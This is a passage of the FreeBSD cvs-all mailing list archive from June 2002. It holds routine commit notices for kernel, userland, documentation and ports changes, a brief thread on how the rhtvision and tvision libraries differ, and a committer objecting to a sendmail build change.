also glad to review changes to it. Revision Changes Path 1.36 +2 -0 src/MAINTAINERS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0: 7: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 665E137B409; Thu, 20 Jun 2002 00:07:01 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K770E14588; Thu, 20 Jun 2002 00:07:00 -0700 (PDT) (envelope-from tjr) Message-Id: <200206200707.g5K770E14588@freefall.freebsd.org> From: "Tim J. Robbins" Date: Thu, 20 Jun 2002 00:07:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/time time.1 time.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/20 00:07:00 PDT Modified files: usr.bin/time time.1 time.c Log: Make it obvious that command line arguments may be specified for the utility that is to be invoked on the command line. Use "utility" instead of "command" in manual page and usage message for consistency with POSIX. Revision Changes Path 1.18 +9 -9 src/usr.bin/time/time.1 1.22 +2 -1 src/usr.bin/time/time.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0: 8:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 03B5437B406; Thu, 20 Jun 2002 00:08:43 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K78hR14834; Thu, 20 Jun 2002 00:08:43 -0700 (PDT) (envelope-from peter) Message-Id: <200206200708.g5K78hR14834@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 00:08:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys uio.h src/sys/kern kern_subr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 00:08:43 PDT Modified files: sys/sys uio.h sys/kern kern_subr.c Log: Remove UIO_USERISPACE - we do not support any split instruction/data address space machines (eg: pdp-11) and are not likely to ever do so. Nothing in our kernel sets this. Revision Changes Path 1.53 +0 -6 src/sys/kern/kern_subr.c 1.20 +0 -1 src/sys/sys/uio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0: 9:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D90DC37B401; Thu, 20 Jun 2002 00:09:24 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K79Oj14949; Thu, 20 Jun 2002 00:09:24 -0700 (PDT) (envelope-from peter) Message-Id: <200206200709.g5K79Oj14949@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 00:09:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/share/doc/papers/fsinterface fsinterface.ms src/share/man/man9 uio.9 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 00:09:24 PDT Modified files: share/doc/papers/fsinterface fsinterface.ms share/man/man9 uio.9 Log: Remove references to UIO_USERISPACE which no longer exists. Revision Changes Path 1.9 +2 -3 src/share/doc/papers/fsinterface/fsinterface.ms 1.13 +1 -4 src/share/man/man9/uio.9 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:12:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8ABA337B404; Thu, 20 Jun 2002 00:12:35 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7CZK15591; Thu, 20 Jun 2002 00:12:35 -0700 (PDT) (envelope-from tjr) Message-Id: <200206200712.g5K7CZK15591@freefall.freebsd.org> From: "Tim J. Robbins" Date: Thu, 20 Jun 2002 00:12:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/time time.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/20 00:12:35 PDT Modified files: usr.bin/time time.1 Log: time(1) does not use the shell to execute the specified utility, remove sentence stating it did. Revision Changes Path 1.19 +2 -6 src/usr.bin/time/time.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:13:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2C75937B405; Thu, 20 Jun 2002 00:13:36 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7DaD15856; Thu, 20 Jun 2002 00:13:36 -0700 (PDT) (envelope-from peter) Message-Id: <200206200713.g5K7DaD15856@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 00:13:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 00:13:35 PDT Modified files: sys/alpha/alpha support.s sys/i386/i386 support.s sys/ia64/ia64 support.s sys/powerpc/powerpc copyinout.c sys/sys systm.h sys/sparc64/sparc64 support.s Log: Deorbit suibyte(). It was only used for split address space systems for supporting UIO_USERISPACE (ie: it wasn't used). Revision Changes Path 1.11 +0 -5 src/sys/alpha/alpha/support.s 1.90 +5 -6 src/sys/i386/i386/support.s 1.14 +0 -5 src/sys/ia64/ia64/support.s 1.6 +0 -7 src/sys/powerpc/powerpc/copyinout.c 1.14 +0 -12 src/sys/sparc64/sparc64/support.s 1.176 +0 -1 src/sys/sys/systm.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:16: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B945737B403; Thu, 20 Jun 2002 00:15:55 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7Ftj16110; Thu, 20 Jun 2002 00:15:55 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200715.g5K7Ftj16110@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 00:15:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/ed buf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 00:15:55 PDT Modified files: bin/ed buf.c Log: Bogusness may have happened using a variable assignment here before, but proper parens mean that fd is always set by open(2) [in any part of C], and so we can accurately check for it returning -1, without feeling like we need to initialise fd to -1 in its declaration. In other words, fix a stylistic/bogus nit. Revision Changes Path 1.21 +1 -1 src/bin/ed/buf.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:23:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F89337B40B; Thu, 20 Jun 2002 00:23:09 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7N8F17089; Thu, 20 Jun 2002 00:23:08 -0700 (PDT) (envelope-from peter) Message-Id: <200206200723.g5K7N8F17089@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 00:23:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/i386 math_emulate.c vm86.c src/sys/sys systm.h src/sys/gnu/i386/fpemul load_store.c reg_ld_str.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 00:23:08 PDT Modified files: sys/i386/i386 math_emulate.c vm86.c sys/sys systm.h sys/gnu/i386/fpemul load_store.c reg_ld_str.c Log: Use suword16/fuword16 instead of susword/fusword - this has two different definitions so far.. 16 bit on x86 and appears to be 32 bit on sparc64. Be explicit to avoid suprises. Revision Changes Path 1.14 +3 -3 src/sys/gnu/i386/fpemul/load_store.c 1.14 +12 -12 src/sys/gnu/i386/fpemul/reg_ld_str.c 1.41 +2 -2 src/sys/i386/i386/math_emulate.c 1.46 +2 -2 src/sys/i386/i386/vm86.c 1.177 +4 -4 src/sys/sys/systm.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:25:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D0D8F37B412; Thu, 20 Jun 2002 00:25:17 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7PHb17261; Thu, 20 Jun 2002 00:25:17 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200725.g5K7PHb17261@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 00:25:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/pure-ftpd Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 00:25:17 PDT Modified files: ftp/pure-ftpd Makefile distinfo Log: upgrade to 1.0.12 Submitted by: maintainer Revision Changes Path 1.28 +2 -2 ports/ftp/pure-ftpd/Makefile 1.27 +1 -1 ports/ftp/pure-ftpd/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:33:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D2A4337B40B; Thu, 20 Jun 2002 00:33:36 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7XaX18368; Thu, 20 Jun 2002 00:33:36 -0700 (PDT) (envelope-from pat) Message-Id: <200206200733.g5K7XaX18368@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 00:33:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/wmnd/files patch-configure patch-src::drivers.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 00:33:36 PDT Added files: net/wmnd/files patch-configure Removed files: net/wmnd/files patch-src::drivers.c Log: - Update to 0.4.2 - Add pkg-message (1) PR: 39065 Submitted by: Andy Sparrow (1) Approved by: maintainer Revision Changes Path 1.1 +12 -0 ports/net/wmnd/files/patch-configure (new) 1.3 +0 -19 ports/net/wmnd/files/patch-src::drivers.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:36:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 89AE137B403; Thu, 20 Jun 2002 00:36:22 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7aMd18588; Thu, 20 Jun 2002 00:36:22 -0700 (PDT) (envelope-from tjr) Message-Id: <200206200736.g5K7aMd18588@freefall.freebsd.org> From: "Tim J. Robbins" Date: Thu, 20 Jun 2002 00:36:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/who who.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/20 00:36:22 PDT Modified files: usr.bin/who who.c Log: Style: put static qualifier on definition of static functions. Revision Changes Path 1.17 +7 -7 src/usr.bin/who/who.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:40:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BC1BE37B40B; Thu, 20 Jun 2002 00:40:53 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7er718900; Thu, 20 Jun 2002 00:40:53 -0700 (PDT) (envelope-from peter) Message-Id: <200206200740.g5K7er718900@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 00:40:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ia64/ia64 support.s src/sys/alpha/alpha support.s X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 00:40:53 PDT Modified files: sys/ia64/ia64 support.s sys/alpha/alpha support.s Log: Update an 'XXX what is this?' type comment about suswintr and fuswintr. These are 16 bit short values used only by the profiling code. Revision Changes Path 1.12 +2 -2 src/sys/alpha/alpha/support.s 1.15 +2 -2 src/sys/ia64/ia64/support.s To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0:41:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A664E37B400; Thu, 20 Jun 2002 00:41:46 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K7fkv19336; Thu, 20 Jun 2002 00:41:46 -0700 (PDT) (envelope-from pat) Message-Id: <200206200741.g5K7fkv19336@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 00:41:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/wmnd Makefile distinfo pkg-message X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 00:41:46 PDT Modified files: net/wmnd Makefile distinfo pkg-message Log: Last commit was approved by maintainer BTW. Revision Changes Path 1.5 +0 -0 ports/net/wmnd/Makefile 1.4 +0 -0 ports/net/wmnd/distinfo 1.2 +0 -0 ports/net/wmnd/pkg-message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1: 6:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 14DC837B40C; Thu, 20 Jun 2002 01:06:48 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K86lx26242; Thu, 20 Jun 2002 01:06:47 -0700 (PDT) (envelope-from tjr) Message-Id: <200206200806.g5K86lx26242@freefall.freebsd.org> From: "Tim J. Robbins" Date: Thu, 20 Jun 2002 01:06:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/expand expand.1 src/usr.bin/unexpand unexpand.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/20 01:06:46 PDT Modified files: (Branch: RELENG_4) usr.bin/expand expand.1 usr.bin/unexpand unexpand.c Log: MFC: unexpand(1) -t option, style/WARNS changes unexpand.c revs. 1.6-1.10, expand.1 revs. 1.8-1.9 Revision Changes Path 1.3.2.5 +24 -8 src/usr.bin/expand/expand.1 1.5.2.1 +140 -65 src/usr.bin/unexpand/unexpand.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:18:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 18BFC37B414; Thu, 20 Jun 2002 01:18:54 -0700 (PDT) Received: (from ceri@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K8IsM27398; Thu, 20 Jun 2002 01:18:54 -0700 (PDT) (envelope-from ceri) Message-Id: <200206200818.g5K8IsM27398@freefall.freebsd.org> From: Ceri Davies Date: Thu, 20 Jun 2002 01:18:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/faq book.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ceri 2002/06/20 01:18:53 PDT Modified files: en_US.ISO8859-1/books/faq book.sgml Log: Multiple typographical and grammatical fixes. PR: docs/39513, docs/39516, docs/39518, docs/39520, docs/39521, docs/39523 Submitted by: Dirk Gouders Revision Changes Path 1.450 +6 -6 doc/en_US.ISO8859-1/books/faq/book.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:21:26 2002 Delivered-To: cvs-all@freebsd.org Received: from kornet.hanirc.org (alfenheim.net [211.216.53.129]) by hub.freebsd.org (Postfix) with ESMTP id 7340437B411; Thu, 20 Jun 2002 01:21:09 -0700 (PDT) Received: from kornet.hanirc.org (smmsp@localhost [127.0.0.1]) by kornet.hanirc.org (8.12.3/8.12.3) with ESMTP id g5K8KjBM093483; Thu, 20 Jun 2002 17:21:07 +0900 (KST) (envelope-from perky@kornet.hanirc.org) Received: (from perky@localhost) by kornet.hanirc.org (8.12.3/8.12.3/Submit) id g5K84ALI085772; Thu, 20 Jun 2002 17:04:10 +0900 (KST) Date: Thu, 20 Jun 2002 17:04:09 +0900 From: Hye-Shik Chang To: Giorgos Keramidas Cc: Ying-Chieh Liao , cvs-all@FreeBSD.ORG, committers@FreeBSD.ORG Subject: Re: Differences of tvision and rhtvision (was: Re: cvs commit: ports/devel ...) Message-ID: <20020620080409.GA84197@fallin.lv> References: <200206171835.g5HIZQo97358@freefall.freebsd.org> <20020620055842.GB67975@hades.hell.gr> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="LQksG6bCIzRHxTLp" Content-Disposition: inline In-Reply-To: <20020620055842.GB67975@hades.hell.gr> User-Agent: Mutt/1.3.28i Organization: Yonsei University Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --LQksG6bCIzRHxTLp Content-Type: text/plain; charset=euc-kr Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jun 20, 2002 at 08:58:42AM +0300, Giorgos Keramidas wrote: > On 2002-06-17 11:35 +0000, Ying-Chieh Liao wrote: > > ijliao 2002/06/17 11:35:25 PDT > > > > Modified files: > > devel Makefile > > Added files: > > devel/rhtvision Makefile distinfo pkg-comment pkg-descr > > pkg-plist > > Log: > > add rhtvision 1.1.4 > > Complete C++ Text User Interface (TUI) library >=20 > Do we know what the differences of rhtvision and tvision are? > Just asking here, since I was thinking of installing tvision > when I saw this commitlog. >=20 > - Giorgos >=20 according http://tvision.sf.net/ : =3D=3D rhtvision =3D=3D This port is a port of the C++ version for the DOS, FreeBSD, Linux, QNX, So= laris and Win32 platforms. The port isn't 100% compatible with the original= version from Borland because we want a library better than the original an= d not with the limititations imposed by the original 16 bits version and th= e huge security holes that are unacceptable. =3D=3D tvision =3D=3D Sergio Sigala made a port to Linux and FreeBSD with "100% of compatibility = with the old version" as goal. The v0.8 of this port can be found in Sunsit= e. Regards, --=20 Hye-Shik Chang Yonsei University, Seoul ^D --LQksG6bCIzRHxTLp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9EYx4DWUsWc/bS6QRAvFkAJ93b0z7+ID24+3ZlqGojoGYMMasOwCgzB+h UzTYYyOW0HVVi2o5XqUnqcM= =92hc -----END PGP SIGNATURE----- --LQksG6bCIzRHxTLp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:36:21 2002 Delivered-To: cvs-all@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 64A3837B403; Thu, 20 Jun 2002 01:36:16 -0700 (PDT) Received: from hades.hell.gr (patr530-a060.otenet.gr [212.205.215.60]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5K8a17A003320; Thu, 20 Jun 2002 11:36:03 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5K8a0dv071049; Thu, 20 Jun 2002 11:36:00 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5K8ZxsS071048; Thu, 20 Jun 2002 11:35:59 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Thu, 20 Jun 2002 11:35:58 +0300 From: Giorgos Keramidas To: Hye-Shik Chang Cc: Ying-Chieh Liao , cvs-all@FreeBSD.org, committers@FreeBSD.org Subject: Re: Differences of tvision and rhtvision (was: Re: cvs commit: ports/devel ...) Message-ID: <20020620083558.GA70981@hades.hell.gr> References: <200206171835.g5HIZQo97358@freefall.freebsd.org> <20020620055842.GB67975@hades.hell.gr> <20020620080409.GA84197@fallin.lv> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020620080409.GA84197@fallin.lv> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-20 17:04 +0000, Hye-Shik Chang wrote: > On Thu, Jun 20, 2002 at 08:58:42AM +0300, Giorgos Keramidas wrote: > > Do we know what the differences of rhtvision and tvision are? > > Just asking here, since I was thinking of installing tvision when > > I saw this commitlog. > > according http://tvision.sf.net/ : > > == rhtvision == > The port isn't 100% compatible with the original version from > Borland because we want a library better than the original ... > > == tvision == > Sergio Sigala made a port to Linux and FreeBSD with "100% of > compatibility with the old version" as goal. Ah, much thanks. This sums it up pretty well :-) - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:36:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6576837B412; Thu, 20 Jun 2002 01:36:25 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K8aP529737; Thu, 20 Jun 2002 01:36:25 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200836.g5K8aP529737@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 01:36:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/astro/match Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 01:36:25 PDT Modified files: astro/match Makefile distinfo Log: upgrade to 0.6 Revision Changes Path 1.3 +1 -1 ports/astro/match/Makefile 1.3 +1 -1 ports/astro/match/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:39:56 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id A641C37B406; Thu, 20 Jun 2002 01:39:51 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 35ADC8B5A4; Thu, 20 Jun 2002 01:39:51 -0700 (PDT) Message-ID: <3D1194D6.993AB531@FreeBSD.org> Date: Thu, 20 Jun 2002 01:39:50 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Gregory Neil Shapiro Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/share/examples/etc make.conf src/share/man/man5make.conf.5 References: <200206200433.g5K4X6N80308@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Gregory Neil Shapiro wrote: > > gshapiro 2002/06/19 21:33:06 PDT > > Modified files: > share/examples/etc make.conf > share/man/man5 make.conf.5 > Log: > Add a warning regarding the SENDMAIL_*_MC make.conf variable values. > Using /etc/mail/sendmail.mc will create /etc/mail/sendmail.cf during > a buildworld. Ummm.... we've never allowed buildworld to install files... I don't think we should start making exceptions to this. Are there other solutions possible? > PR: misc/39397 http://www.FreeBSD.org/cgi/query-pr.cgi?pr=39397 > MFC after: 3 days > > Revision Changes Path > 1.192 +9 -0 src/share/examples/etc/make.conf > 1.52 +21 -0 src/share/man/man5/make.conf.5 > > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/share/examples/etc/make.conf.diff?&r1=1.191&r2=1.192&f=h > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/share/man/man5/make.conf.5.diff?&r1=1.51&r2=1.52&f=h -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:41:47 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 7CF9B37B406; Thu, 20 Jun 2002 01:41:39 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 268F08B5A4; Thu, 20 Jun 